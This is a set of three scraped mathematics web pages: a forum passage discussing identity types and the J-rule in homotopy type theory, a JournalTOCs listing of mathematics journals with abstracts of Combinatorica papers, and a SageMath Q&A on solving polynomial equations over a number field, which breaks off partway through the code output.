attempt at an exposition – particularly since I just list a bunch of facts, no philosophy involved (apart from some ancient Latin quotes, for entertainment). • CommentRowNumber97. • CommentAuthorMike Shulman • CommentTimeSep 28th 2022 Urs, what I’m saying is that $Id_{Id_X(x,x')}(p \cdot id_x, p)$ and $Id_{\sum_{x':X} Id_X(x,x')}((x,id_x),(x',p))$ are different types. The latter is equivalent to $\sum_{q:Id_X(x,x')} Id_{Id_X(x,x')}(q\cdot id_x, p)$, so we can inhabit it if we can inhabit the first one — but the proof of that equivalence uses the J-rule. So if you’re trying to motivate the J-rule, you can’t use that equivalence. Thus, motivating the fact that $Id_{Id_X(x,x')}(p \cdot id_x, p)$ is inhabited doesn’t suffice to motivate the J-rule, because to derive the J-rule you need instead to know that $Id_{\sum_{x':X} Id_X(x,x')}((x,id_x),(x',p))$ is inhabited. • CommentRowNumber98. • CommentAuthorMike Shulman • CommentTimeSep 28th 2022 Re 90: Is equality in classical mathematics definitional equality? First-order logic does not really have a “definitional equality” in the way that type theory does. Or if it does, it’s fairly trivial. As you say, mathematics formulated in first-order logic, like ZFC, uses a propositional equality. • CommentRowNumber99. • CommentAuthorMike Shulman • CommentTimeSep 28th 2022 Re 82 There are also Swan identity types. What are the motivation behind those identity types, and how is that different from the motivation behind Martin-Löf identity types? Interesting question! I don’t know whether Swan identity types have any philosophical justification; the point as I understand it is just to get a kind of identity type in cubical type theory that satisfies a definitional computation rule for J. I mean, you can look at their construction and try to consider that a motivation, but you’d have to already have and understand the cubical identity types. • CommentRowNumber100. • CommentAuthorMike Shulman • CommentTimeSep 28th 2022 Re 78 Book HoTT’s identity types are by default homogeneous identity types, while both cubical type theory’s path types and H.O.T.T.’s identity types are heterogeneous identity types. There’s definitely a difference, but I wouldn’t phrase it like that. In particular, I’m not sure what “by default” means. All three theories have both homogeneous and heterogeneous identity types, and it’s not possible to have only heterogeneous ones because they have to depend on the homogeneous ones. I would say the difference is in how the heterogeneous identity types “reduce to” the homegeneous ones when the type dependence is trivial. In Book HoTT, this reduction is only up to equivalence. In HOTT, it’s a definitional equality. I’m not positive about cubical type theory, but I think there it is a definitional isomorphism.
2022-12-08 08:58:23
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 65, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8221916556358337, "perplexity": 2014.8537717833685}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446711286.17/warc/CC-MAIN-20221208082315-20221208112315-00031.warc.gz"}
http://www.journaltocs.ac.uk/index.php?action=browse&subAction=subjects&publisherID=8&journalID=2622&pageb=1&userQueryID=&sort=&local_page=&sorType=&sorCol=
for Journals by Title or ISSN for Articles by Keywords help Subjects -> MATHEMATICS (Total: 968 journals)     - APPLIED MATHEMATICS (81 journals)    - GEOMETRY AND TOPOLOGY (20 journals)    - MATHEMATICS (714 journals)    - MATHEMATICS (GENERAL) (41 journals)    - NUMERICAL ANALYSIS (22 journals)    - PROBABILITIES AND MATH STATISTICS (90 journals) MATHEMATICS (714 journals)                  1 2 3 4 | Last Showing 1 - 200 of 538 Journals sorted alphabetically Abakós       (Followers: 4) Abhandlungen aus dem Mathematischen Seminar der Universitat Hamburg       (Followers: 4) Academic Voices : A Multidisciplinary Journal       (Followers: 2) Accounting Perspectives       (Followers: 7) ACM Transactions on Algorithms (TALG)       (Followers: 15) ACM Transactions on Computational Logic (TOCL)       (Followers: 3) ACM Transactions on Mathematical Software (TOMS)       (Followers: 6) ACS Applied Materials & Interfaces       (Followers: 29) Acta Applicandae Mathematicae       (Followers: 1) Acta Mathematica       (Followers: 12) Acta Mathematica Hungarica       (Followers: 2) Acta Mathematica Scientia       (Followers: 5) Acta Mathematica Sinica, English Series       (Followers: 6) Acta Mathematica Vietnamica Acta Mathematicae Applicatae Sinica, English Series Advanced Science Letters       (Followers: 10) Advances in Applied Clifford Algebras       (Followers: 4) Advances in Calculus of Variations       (Followers: 3) Advances in Catalysis       (Followers: 5) Advances in Complex Systems       (Followers: 7) Advances in Computational Mathematics       (Followers: 19) Advances in Decision Sciences       (Followers: 3) Advances in Difference Equations       (Followers: 3) Advances in Fixed Point Theory       (Followers: 5) Advances in Geosciences (ADGEO)       (Followers: 13) Advances in Linear Algebra & Matrix Theory       (Followers: 3) Advances in Materials Science       (Followers: 14) Advances in Mathematical Physics       (Followers: 4) Advances in Mathematics       (Followers: 11) Advances in Numerical Analysis       (Followers: 5) Advances in Operations Research       (Followers: 12) Advances in Porous Media       (Followers: 5) Advances in Pure and Applied Mathematics       (Followers: 6) Advances in Pure Mathematics       (Followers: 6) Advances in Science and Research (ASR)       (Followers: 6) Aequationes Mathematicae       (Followers: 2) African Journal of Educational Studies in Mathematics and Sciences       (Followers: 5) African Journal of Mathematics and Computer Science Research       (Followers: 4) Afrika Matematika       (Followers: 1) Air, Soil & Water Research       (Followers: 11) AKSIOMA Journal of Mathematics Education       (Followers: 1) Al-Jabar : Jurnal Pendidikan Matematika       (Followers: 1) Algebra and Logic       (Followers: 6) Algebra Colloquium       (Followers: 4) Algebra Universalis       (Followers: 2) Algorithmic Operations Research       (Followers: 5) Algorithms       (Followers: 11) Algorithms Research       (Followers: 1) American Journal of Computational and Applied Mathematics       (Followers: 5) American Journal of Mathematical Analysis American Journal of Mathematics       (Followers: 6) American Journal of Operations Research       (Followers: 5) An International Journal of Optimization and Control: Theories & Applications       (Followers: 8) Analele Universitatii Ovidius Constanta - Seria Matematica       (Followers: 1) Analysis and Applications       (Followers: 1) Analysis and Mathematical Physics       (Followers: 5) Analysis Mathematica Analysis. International mathematical journal of analysis and its applications       (Followers: 2) Annales Mathematicae Silesianae Annales mathématiques du Québec       (Followers: 4) Annales Universitatis Paedagogicae Cracoviensis. Studia Mathematica Annali di Matematica Pura ed Applicata       (Followers: 1) Annals of Combinatorics       (Followers: 4) Annals of Data Science       (Followers: 12) Annals of Discrete Mathematics       (Followers: 6) Annals of Mathematics       (Followers: 1) Annals of Mathematics and Artificial Intelligence       (Followers: 12) Annals of Pure and Applied Logic       (Followers: 3) Annals of the Alexandru Ioan Cuza University - Mathematics Annals of the Institute of Statistical Mathematics       (Followers: 1) Annals of West University of Timisoara - Mathematics Annuaire du Collège de France       (Followers: 5) ANZIAM Journal       (Followers: 1) Applicable Algebra in Engineering, Communication and Computing       (Followers: 2) Applications of Mathematics       (Followers: 2) Applied Categorical Structures       (Followers: 2) Applied Computational Intelligence and Soft Computing       (Followers: 11) Applied Mathematics       (Followers: 3) Applied Mathematics       (Followers: 7) Applied Mathematics & Optimization       (Followers: 6) Applied Mathematics - A Journal of Chinese Universities Applied Mathematics Letters       (Followers: 2) Applied Mathematics Research eXpress       (Followers: 1) Applied Network Science       (Followers: 3) Applied Numerical Mathematics       (Followers: 5) Applied Spatial Analysis and Policy       (Followers: 5) Arab Journal of Mathematical Sciences       (Followers: 3) Arabian Journal of Mathematics       (Followers: 2) Archive for Mathematical Logic       (Followers: 3) Archive of Applied Mechanics       (Followers: 5) Archive of Numerical Software Archives of Computational Methods in Engineering       (Followers: 5) Arkiv för Matematik       (Followers: 1) Armenian Journal of Mathematics Arnold Mathematical Journal       (Followers: 1) Artificial Satellites       (Followers: 20) Asia-Pacific Journal of Operational Research       (Followers: 3) Asian Journal of Algebra       (Followers: 1) Asian Journal of Current Engineering & Maths Asian-European Journal of Mathematics       (Followers: 2) Australian Mathematics Teacher, The       (Followers: 6) Australian Primary Mathematics Classroom       (Followers: 4) Australian Senior Mathematics Journal       (Followers: 1) Automatic Documentation and Mathematical Linguistics       (Followers: 5) Axioms       (Followers: 1) Baltic International Yearbook of Cognition, Logic and Communication       (Followers: 1) Basin Research       (Followers: 5) BIBECHANA       (Followers: 2) BIT Numerical Mathematics BoEM - Boletim online de Educação Matemática Boletim Cearense de Educação e História da Matemática Boletim de Educação Matemática Boletín de la Sociedad Matemática Mexicana Bollettino dell'Unione Matematica Italiana       (Followers: 1) British Journal of Mathematical and Statistical Psychology       (Followers: 20) Bruno Pini Mathematical Analysis Seminar Buletinul Academiei de Stiinte a Republicii Moldova. Matematica       (Followers: 12) Bulletin des Sciences Mathamatiques       (Followers: 4) Bulletin of Dnipropetrovsk University. Series : Communications in Mathematical Modeling and Differential Equations Theory       (Followers: 1) Bulletin of Mathematical Sciences       (Followers: 1) Bulletin of Symbolic Logic       (Followers: 2) Bulletin of the Australian Mathematical Society       (Followers: 1) Bulletin of the Brazilian Mathematical Society, New Series Bulletin of the London Mathematical Society       (Followers: 4) Bulletin of the Malaysian Mathematical Sciences Society Calculus of Variations and Partial Differential Equations Canadian Journal of Science, Mathematics and Technology Education       (Followers: 19) Carpathian Mathematical Publications       (Followers: 1) Catalysis in Industry       (Followers: 1) CEAS Space Journal       (Followers: 2) CHANCE       (Followers: 5) Chaos, Solitons & Fractals       (Followers: 3) ChemSusChem       (Followers: 7) Chinese Annals of Mathematics, Series B Chinese Journal of Catalysis       (Followers: 2) Chinese Journal of Mathematics Clean Air Journal       (Followers: 1) Cogent Mathematics       (Followers: 2) Cognitive Computation       (Followers: 4) Collectanea Mathematica COMBINATORICA Combinatorics, Probability and Computing       (Followers: 4) Combustion Theory and Modelling       (Followers: 14) Commentarii Mathematici Helvetici       (Followers: 1) Communications in Combinatorics and Optimization Communications in Contemporary Mathematics Communications in Mathematical Physics       (Followers: 2) Communications On Pure & Applied Mathematics       (Followers: 3) Complex Analysis and its Synergies       (Followers: 2) Complex Variables and Elliptic Equations: An International Journal Complexus Composite Materials Series       (Followers: 8) Compositio Mathematica       (Followers: 1) Comptes Rendus Mathematique       (Followers: 1) Computational and Applied Mathematics       (Followers: 2) Computational and Mathematical Methods in Medicine       (Followers: 2) Computational and Mathematical Organization Theory       (Followers: 2) Computational Complexity       (Followers: 4) Computational Mathematics and Modeling       (Followers: 8) Computational Mechanics       (Followers: 5) Computational Methods and Function Theory Computational Optimization and Applications       (Followers: 7) Computers & Mathematics with Applications       (Followers: 8) Concrete Operators       (Followers: 5) Confluentes Mathematici Contributions to Game Theory and Management COSMOS Cryptography and Communications       (Followers: 13) Cuadernos de Investigación y Formación en Educación Matemática Cubo. A Mathematical Journal Current Research in Biostatistics       (Followers: 9) Czechoslovak Mathematical Journal       (Followers: 1) Demographic Research       (Followers: 11) Demonstratio Mathematica Dependence Modeling Design Journal : An International Journal for All Aspects of Design       (Followers: 29) Developments in Clay Science       (Followers: 1) Developments in Mineral Processing       (Followers: 3) Dhaka University Journal of Science Differential Equations and Dynamical Systems       (Followers: 3) Differentsial'nye Uravneniya Discrete Mathematics       (Followers: 8) Discrete Mathematics & Theoretical Computer Science Discrete Mathematics, Algorithms and Applications       (Followers: 2) Discussiones Mathematicae - General Algebra and Applications Discussiones Mathematicae Graph Theory       (Followers: 1) Diskretnaya Matematika Dnipropetrovsk University Mathematics Bulletin Doklady Akademii Nauk Doklady Mathematics Duke Mathematical Journal       (Followers: 1) Eco Matemático Edited Series on Advances in Nonlinear Science and Complexity Electronic Journal of Combinatorics Electronic Journal of Differential Equations Electronic Journal of Graph Theory and Applications       (Followers: 2) Electronic Notes in Discrete Mathematics       (Followers: 2) Elemente der Mathematik       (Followers: 4) Energy for Sustainable Development       (Followers: 9) Enseñanza de las Ciencias : Revista de Investigación y Experiencias Didácticas 1 2 3 4 | Last COMBINATORICAJournal Prestige (SJR): 1.764 Citation Impact (citeScore): 1Number of Followers: 0      Hybrid journal (It can contain Open Access articles) ISSN (Print) 1439-6912 - ISSN (Online) 0209-9683 Published by Springer-Verlag  [2348 journals] • Maximum Scattered Linear Sets and Complete Caps in Galois Spaces • Authors: Daniele Bartoli; Massimo Giulietti; Giuseppe Marino; Olga Polverino Pages: 255 - 278 Abstract: Abstract Explicit constructions of infinite families of scattered F q -linear sets in PG(r-1, q t ) of maximal rank rt/2, for t ≥ 4 even, are provided. When q = 2, these linear sets correspond to complete caps in AG(r,2 t ) fixed by a translation group of size 2rt/2. The doubling construction applied to such caps gives complete caps in AG(r+1, 2 t ) of size 2rt/2+1. For Galois spaces of even dimension greater than 2 and even square order, this solves the long-standing problem of establishing whether the theoretical lower bound for the size of a complete cap is substantially sharp. PubDate: 2018-04-01 DOI: 10.1007/s00493-016-3531-6 Issue No: Vol. 38, No. 2 (2018) • Intervals of Permutation Class Growth Rates • Authors: David Bevan Pages: 279 - 303 Abstract: Abstract We prove that the set of growth rates of permutation classes includes an infinite sequence of intervals whose infimum is θ B ≈ 2:35526, and that it also contains every value at least θ B ≈ 2:35698. These results improve on a theorem of Vatter, who determined that there are permutation classes of every growth rate at least λ A ≈ 2:48187. Thus, we also refute his conjecture that the set of growth rates below λ A is nowhere dense. Our proof is based upon an analysis of expansions of real numbers in non-integer bases, the study of which was initiated by Rényi in the 1950s. In particular, we prove two generalisations of a result of Pedicini concerning expansions in which the digits are drawn from sets of allowed values. PubDate: 2018-04-01 DOI: 10.1007/s00493-016-3349-2 Issue No: Vol. 38, No. 2 (2018) • Local Convergence of Random Graph Colorings • Authors: Amin Coja-Oghlan; Charilaos Efthymiou; Nor Jaafari Pages: 341 - 380 Abstract: Abstract Let G = G(n, m) be a random graph whose average degree d = 2m/n is below the k-colorability threshold. If we sample a k-coloring σ of G uniformly at random, what can we say about the correlations between the colors assigned to vertices that are far apart' According to a prediction from statistical physics, for average degrees below the so-called condensation threshold dk,cond, the colors assigned to far away vertices are asymptotically independent [Krzakala et al.: Proc. National Academy of Sciences 2007]. We prove this conjecture for k exceeding a certain constant k0. More generally, we investigate the joint distribution of the k-colorings that σ induces locally on the bounded-depth neighborhoods of any fixed number of vertices. In addition, we point out an implication on the reconstruction problem. PubDate: 2018-04-01 DOI: 10.1007/s00493-016-3394-x Issue No: Vol. 38, No. 2 (2018) • Connected Tree-Width • Authors: Reinhard Diestel; Malte Müller Pages: 381 - 398 Abstract: Abstract The connected tree-width of a graph is the minimum width of a tree-decomposition whose parts induce connected subgraphs. Long cycles are examples of graphs that have small tree-width but large connected tree-width. We show that a graph has small connected tree-width if and only if it has small tree-width and contains no long geodesic cycle. We further prove a connected analogue of the duality theorem for tree-width: a finite graph has small connected tree-width if and only if it has no bramble whose connected covers are all large. Both these results are qualitative: the bounds are good but not tight. We show that graphs of connected tree-width k are k-hyperbolic, which is tight, and that graphs of tree-width k whose geodesic cycles all have length at most ℓ are ⌊3/2l(k-1)⌋-hyperbolic. The existence of such a function h(k, ℓ) had been conjectured by Sullivan. PubDate: 2018-04-01 DOI: 10.1007/s00493-016-3516-5 Issue No: Vol. 38, No. 2 (2018) • Conway Groupoids and Completely Transitive Codes • Authors: Nick Gill; Neil I. Gillespie; Jason Semeraro Pages: 399 - 442 Abstract: Abstract To each supersimple 2-(n,4,λ) design D one associates a ‘Conway groupoid’, which may be thought of as a natural generalisation of Conway’s Mathieu groupoid M13 which is constructed from P3. We show that Sp2m(2) and 22m. Sp2m(2) naturally occur as Conway groupoids associated to certain designs. It is shown that the incidence matrix associated to one of these designs generates a new family of completely transitive F2-linear codes with minimum distance 4 and covering radius 3, whereas the incidence matrix of the other design gives an alternative construction of a previously known family of completely transitive codes. We also give a new characterization of M13 and prove that, for a fixed λ > 0; there are finitely many Conway groupoids for which the set of morphisms does not contain all elements of the full alternating group. PubDate: 2018-04-01 DOI: 10.1007/s00493-016-3433-7 Issue No: Vol. 38, No. 2 (2018) • Point-Curve Incidences in the Complex Plane • Authors: Adam Sheffer; Endre Szabó; Joshua Zahl Pages: 487 - 499 Abstract: Abstract We prove an incidence theorem for points and curves in the complex plane. Given a set of m points in ℝ2 and a set of n curves with k degrees of freedom, Pach and Sharir proved that the number of point-curve incidences is $$O\left( {{m^{\frac{k}{{2k - 1}}}}{n^{\frac{{2k - 2}}{{2k - 1}}}} + m + n} \right)$$ . We establish the slightly weaker bound $${O_\varepsilon }\left( {{m^{\frac{k}{{2k - 1}} + \varepsilon }}{n^{\frac{{2k - 2}}{{2k - 1}}}} + m + n} \right)$$ on the number of incidences between m points and n (complex) algebraic curves in ℂ2 with k degrees of freedom. We combine tools from algebraic geometry and differential geometry to prove a key technical lemma that controls the number of complex curves that can be contained inside a real hypersurface. This lemma may be of independent interest to other researchers proving incidence theorems over ℂ. PubDate: 2018-04-01 DOI: 10.1007/s00493-016-3441-7 Issue No: Vol. 38, No. 2 (2018) • More Distinct Distances Under Local Conditions • Authors: Jacob Fox; János Pach; Andrew Suk Pages: 501 - 509 Abstract: Abstract We establish the following result related to Erdős’s problem on distinct distances. Let V be an n-element planar point set such that any p members of V determine at least $$\left( {\begin{array}{*{20}{c}} p \\ 2 \end{array}} \right) - p + 6$$ distinct distances. Then V determines at least $$n^{\tfrac{8} {7} - o(1)}$$ distinct distances, as n tends to infinity. PubDate: 2018-04-01 DOI: 10.1007/s00493-016-3637-x Issue No: Vol. 38, No. 2 (2018) • List Supermodular Coloring with Shorter Lists • Authors: Yu Yokoi Abstract: Abstract In 1995, Galvin proved that a bipartite graph G admits a list edge coloring if every edge is assigned a color list of length Δ(G) the maximum degree of the graph. This result was improved by Borodin, Kostochka and Woodall, who proved that G still admits a list edge coloring if every edge e=st is assigned a list of max{d G (s);d G (t)} colors. Recently, Iwata and Yokoi provided the list supermodular coloring theorem that extends Galvin's result to the setting of Schrijver's supermodular coloring. This paper provides a common generalization of these two extensions of Galvin's result. PubDate: 2018-05-17 DOI: 10.1007/s00493-018-3830-1 • Edge-Partitioning a Graph into Paths: Beyond the Barát-Thomassen Conjecture • Authors: Julien Bensmail; Ararat Harutyunyan; Tien-Nam Le; Stéphan Thomasse Abstract: Abstract In 2006, Barát and Thomassen conjectured that there is a function f such that, for every fixed tree T with t edges, every f(t)-edge-connected graph with its number of edges divisible by t has a partition of its edges into copies of T. This conjecture was recently verified by the current authors and Merker [1]. We here further focus on the path case of the Barát-Thomassen conjecture. Before the aforementioned general proof was announced, several successive steps towards the path case of the conjecture were made, notably by Thomassen [11,12,13], until this particular case was totally solved by Botler, Mota, Oshiro andWakabayashi [2]. Our goal in this paper is to propose an alternative proof of the path case with a weaker hypothesis: Namely, we prove that there is a function f such that every 24-edge-connected graph with minimum degree f(t) has an edge-partition into paths of length t whenever t divides the number of edges. We also show that 24 can be dropped to 4 when the graph is eulerian. PubDate: 2018-05-17 DOI: 10.1007/s00493-017-3661-5 • Long Cycles have the Edge-Erdős-Pósa Property • Authors: Henning Bruhn; Matthias Heinlein; Felix Joos Abstract: Abstract We prove that the set of long cycles has the edge-Erdős-Pósa property: for every fixed integer ℓ ≥ 3 and every k ∈ ℕ, every graph G either contains k edge-disjoint cycles of length at least ℓ (long cycles) or an edge set X of size O(k2 logk+kℓ) such that G—X does not contain any long cycle. This answers a question of Birmelé, Bondy, and Reed (Combinatorica 27 (2007), 135-145). PubDate: 2018-05-17 DOI: 10.1007/s00493-017-3669-x • A Remark on the Paper “Properties of Intersecting Families of Ordered Sets” by O. Einstein • Authors: Sang-Il Oum; Sounggun Wee Abstract: Abstract O. Einstein (2008) proved Bollobás-type theorems on intersecting families of ordered sets of finite sets and subspaces. Unfortunately, we report that the proof of a theorem on ordered sets of subspaces had a mistake. We prove two weaker variants. PubDate: 2018-04-17 DOI: 10.1007/s00493-018-3812-3 • A Note on Restricted List Edge-Colourings • Authors: Tamás Fleiner Abstract: Abstract We prove an extension of Galvin’s theorem, namely that any graph is L-edge-choosable if L(e) ≥χ′(G) and the edge-lists of no odd cycle contain a common colour. PubDate: 2018-04-17 DOI: 10.1007/s00493-018-3888-9 • The Sub-Exponential Transition for the Chromatic Generalized Ramsey Numbers • Authors: Choongbum Lee; Brandon Tran Abstract: Abstract A simple graph-product type construction shows that for all natural numbers r≥q, there exists an edge-coloring of the complete graph on 2 r vertices using r colors where the graph consisting of the union of any q color classes has chromatic number 2 q . We show that for each fixed natural number q, if there exists an edge-coloring of the complete graph on n vertices using r colors where the graph consisting of the union of any q color classes has chromatic number at most 2 q − 1, then n must be sub-exponential in r. This answers a question of Conlon, Fox, Lee, and Sudakov. PubDate: 2018-04-17 DOI: 10.1007/s00493-017-3474-6 • Local Algorithms, Regular Graphs of Large Girth, and Random Regular Graphs • Authors: Carlos Hoppen; Nicholas Wormald Abstract: Abstract We introduce a general class of algorithms and analyse their application to regular graphs of large girth. In particular, we can transfer several results proved for random regular graphs into (deterministic) results about all regular graphs with sufficiently large girth. This reverses the usual direction, which is from the deterministic setting to the random one. In particular, this approach enables, for the first time, the achievement of results equivalent to those obtained on random regular graphs by a powerful class of algorithms which contain prioritised actions. As a result, we obtain new upper or lower bounds on the size of maximum independent sets, minimum dominating sets, maximum k-independent sets, minimum k-dominating sets and maximum k-separated matchings in r-regular graphs with large girth. PubDate: 2018-04-17 DOI: 10.1007/s00493-016-3236-x • The Probability of Generating the Symmetric Group • Authors: Sean Eberhard; Stefan-Christoph Virchow Abstract: Abstract We consider the probability p(S n ) that a pair of random permutations generates either the alternating group A n or the symmetric group S n . Dixon (1969) proved that p(S n ) approaches 1 as n→∞ and conjectured that p(S n ) = 1 − 1/n+o(1/n). This conjecture was verified by Babai (1989), using the Classification of Finite Simple Groups. We give an elementary proof of this result; specifically we show that p(S n ) = 1 − 1/n+O(n−2+ε). Our proof is based on character theory and character estimates, including recent work by Schlage-Puchta (2012). PubDate: 2018-03-27 DOI: 10.1007/s00493-017-3629-5 • Infinite Graphic Matroids • Authors: Nathan Bowler; Johannes Carmesin; Robin Christian Abstract: Abstract We introduce a class of infinite graphic matroids that contains all the motivating examples and satisfies an extension of Tutte’s excluded minors characterisation of finite graphic matroids.We prove that its members can be represented by certain ‘graph-like’ topological spaces previously considered by Thomassen and Vella. PubDate: 2018-03-27 DOI: 10.1007/s00493-016-3178-3 • Castelnuovo-Mumford Regularity of Graphs • Authors: Türker Bıyıkoğlu; Yusuf Civan Abstract: Abstract We present new combinatorial results on the calculation of (Castelnuovo-Mumford) regularity of graphs. We introduce the notion of a prime graph over a field k, which we define to be a connected graph with regk(G − x) < regk(G) for any vertex x ∈ V (G). We then exhibit some structural properties of prime graphs. This enables us to provide upper bounds to the regularity involving the induced matching number im(G). We prove that reg(G) ≤ (Γ(G)+1)im(G) holds for any graph G, where Γ(G)=max{ N G [x]\N G [y] : xy ∈ E(G)} is the maximum privacy degree of G and N G [x] is the closed neighbourhood of x in G. In the case of claw-free graphs, we verify that this bound can be strengthened by showing that reg(G)≤2im(G). By analysing the effect of Lozin transformations on graphs, we narrow the search for prime graphs into graphs having maximum degree at most three. We show that the regularity of such graphs G is bounded above by 2im(G)+1. Moreover, we prove that any non-trivial Lozin operation preserves the primeness of a graph. That enables us to generate many new prime graphs from the existing ones. We prove that the inequality reg(G/e)≤reg(G)≤reg(G/e)+1 holds for the contraction of any edge e of a graph G. This implies that reg(H) ≤ reg(G) whenever H is an edge contraction minor of G. Finally, we show that there exist connected graphs satisfying reg(G)=n and im(G)=k for any two integers n ≥ k ≥ 1. The proof is based on a result of Januszkiewicz and Świa̦tkowski on the existence of Gromov hyperbolic right angled Coxeter groups of arbitrarily large virtual cohomological dimension, accompanied with Lozin operations. In an opposite direction, we show that if G is a 2K2-free prime graph, then reg(G)≤(δ(G)+3)/2, where δ(G) is the minimum degree of G. PubDate: 2018-03-27 DOI: 10.1007/s00493-017-3450-1 • Simultaneous Linear Discrepancy for Unions of Intervals • Authors: Ron Holzman; Nitzan Tur Abstract: Abstract Lovász proved (see [7]) that given real numbers p1,..., p n , one can round them up or down to integers ϵ1,..., ϵ n , in such a way that the total rounding error over every interval (i.e., sum of consecutive p i ’s) is at most 1-1/n+1. Here we show that the rounding can be done so that for all $$d = 1,...,\left\lfloor {\frac{{n + 1}}{2}} \right\rfloor$$ , the total rounding error over every union of d intervals is at most (1- d/n+1) d. This answers a question of Bohman and Holzman [1], who showed that such rounding is possible for each value of d separately. PubDate: 2018-03-05 DOI: 10.1007/s00493-017-3769-7 • Long Cycles in Locally Expanding Graphs, with Applications • Authors: Michael Krivelevich Abstract: Abstract We provide sufficient conditions for the existence of long cycles in locally expanding graphs, and present applications of our conditions and techniques to Ramsey theory, random graphs and positional games. PubDate: 2018-03-05 DOI: 10.1007/s00493-017-3701-1 • Associahedra Via Spines • Authors: Carsten Lange; Vincent Pilaud Abstract: Abstract An associahedron is a polytope whose vertices correspond to triangulations of a convex polygon and whose edges correspond to flips between them. Using labeled polygons, C. Hohlweg and C. Lange constructed various realizations of the associahedron with relevant properties related to the symmetric group and the permutahedron. We introduce the spine of a triangulation as its dual tree together with a labeling and an orientation. This notion extends the classical understanding of the associahedron via binary trees, introduces a new perspective on C. Hohlweg and C. Lange’s construction closer to J.-L. Loday’s original approach, and sheds light upon the combinatorial and geometric properties of the resulting realizations of the associahedron. It also leads to noteworthy proofs which shorten and simplify previous approaches. PubDate: 2018-02-07 DOI: 10.1007/s00493-015-3248-y JournalTOCs School of Mathematical and Computer Sciences Heriot-Watt University Edinburgh, EH14 4AS, UK Email: journaltocs@hw.ac.uk Tel: +00 44 (0)131 4513762 Fax: +00 44 (0)131 4513327 About JournalTOCs API Help News (blog, publications) JournalTOCs © 2009-
2018-08-19 17:02:11
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7919394969940186, "perplexity": 5652.898902536344}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-34/segments/1534221215261.83/warc/CC-MAIN-20180819165038-20180819185038-00651.warc.gz"}
https://ask.sagemath.org/question/50044/solving-system-of-equations-over-number-field/
# solving system of equations over number field I am trying to solve two, 2-variable polynomial equations over $F:=\mathbb{Q}(i)$ modulo $K:=F(\sqrt{2})$. Specifically, if p1 = $a^2+6b^2$, p2 = $3a^2+2b^2$, and $K^{\ast4}:=\langle k^4\vert k\in K\setminus 0 \rangle$ i.e. the group of 4th powers of nonzero elements of $K$. I want to find (all?) $a$ and $b$ in $F$ such that p1$\equiv$1 modulo $K^{\ast4}$ and p2$\equiv$-1 modulo $K^{\ast4}$. Any amount of walk through or pointing in the right direction, or telling me this might not be doable would be great! I am relatively new to sage, or at least it has been years since I've used it. edit retag close merge delete Sort by » oldest newest most voted The best I can do is reduce it to a system of 8 equations in $12$ variables over $\mathbb{Q}$. Write $a=x+yi$ and $b=z+wi$. We want $a^2+6b^2$ to be a fourth power, say $(a_1 + a_2i + a_3\sqrt{2} + a_4\sqrt{2}i)^4$. Similarly we want $-(3a^2 + 2b^2) = (b_1 + b_2i + b_3\sqrt{2} + b_4\sqrt{2}i)^4$. We can get the $\mathbb{Q}$-coefficients of these equations by making a polynomial ring over $K$ in the variables $x,y,z,w,a_1,a_2,a_3,a_4,b_1,b_2,b_3,b_4$, then using the vector space structure of $K$ and changing the ring of the vectors to a polynomial ring in the same variables over $\mathbb{Q}$. x = polygen(QQ) F.<i> = NumberField(x^2 + 1) K.<t> = F.extension(x^2 - 2) R.<x,y,z,w,a1,a2,a3,a4,b1,b2,b3,b4> = PolynomialRing(K, 2+2+2*4) a = x + y*i b = z + w*i eq1 = a^2 + 6*b^2 - (a1 + a2*i + a3*t + a4*i*t)^4 eq2 = -(3*a^2 + 2*b^2) - (b1 + b2*i + b3*t + b4*i*t)^4 V, from_V, to_V = K.absolute_vector_space() S = PolynomialRing(QQ, names=R.gens()) R_to_4S = lambda u: list(sum(to_V(c).change_ring(S)*S(m) for (c,m) in zip(u.coefficients(), u.monomials()))) I = S.ideal(R_to_4S(eq1) + R_to_4S(eq2)) I.gens() Output: [-a1^4 + 6*a1^2*a2^2 - a2^4 - 6*a1^2*a2*a3 + 2*a2^3*a3 - 12*a1^2*a3^2 + 12*a2^2*a3^2 - 4*a2*a3^3 - 4*a3^4 - 2*a1^3*a4 + 6*a1*a2^2*a4 + 48*a1*a2*a3*a4 - 12*a1*a3^2*a4 + 12*a1^2*a4^2 - 12*a2^2*a4^2 + 12*a2*a3*a4^2 + 24*a3^2*a4^2 + 4*a1*a4^3 - 4*a4^4 + x^2 - y^2 + 6*z^2 - 6*w^2, 2/3*a1^3*a2 - 2/3*a1*a2^3 - 10/3*a1^3*a3 + 10*a1*a2^2*a3 + 4*a1*a2*a3^2 - 20/3*a1*a3^3 + 10*a1^2*a2*a4 - 10/3*a2^3*a4 + 4*a1^2*a3*a4 - 4*a2^2*a3*a4 + 20*a2*a3^2*a4 + 8/3*a3^3*a4 - 